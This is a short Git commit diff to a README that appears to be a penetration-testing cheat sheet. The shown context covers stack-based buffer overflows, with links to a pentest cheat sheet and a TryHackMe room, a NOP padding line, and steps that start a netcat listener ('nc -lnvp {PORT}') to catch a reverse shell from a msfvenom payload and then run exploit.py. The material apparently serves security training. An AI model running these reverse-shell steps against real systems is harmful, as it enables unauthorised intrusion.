Update README.md

This commit is contained in:
Joe Totes
2022-09-01 08:48:38 -04:00
committed by GitHub
parent e4b150104a
commit 08f0ffd4ca

View File

@@ -542,6 +542,8 @@ upload {FILE.exe}
*** ***
<br /> <br />
## Stack Based
https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
https://tryhackme.com/room/bufferoverflowprep https://tryhackme.com/room/bufferoverflowprep
@@ -595,6 +597,7 @@ padding = "\x90" * 16
# Start NC on msfvenom IP and Port and exploit # Start NC on msfvenom IP and Port and exploit
sudo nc -lnvp {PORT} sudo nc -lnvp {PORT}
python3 exploit.py python3 exploit.py
```
<br /> <br />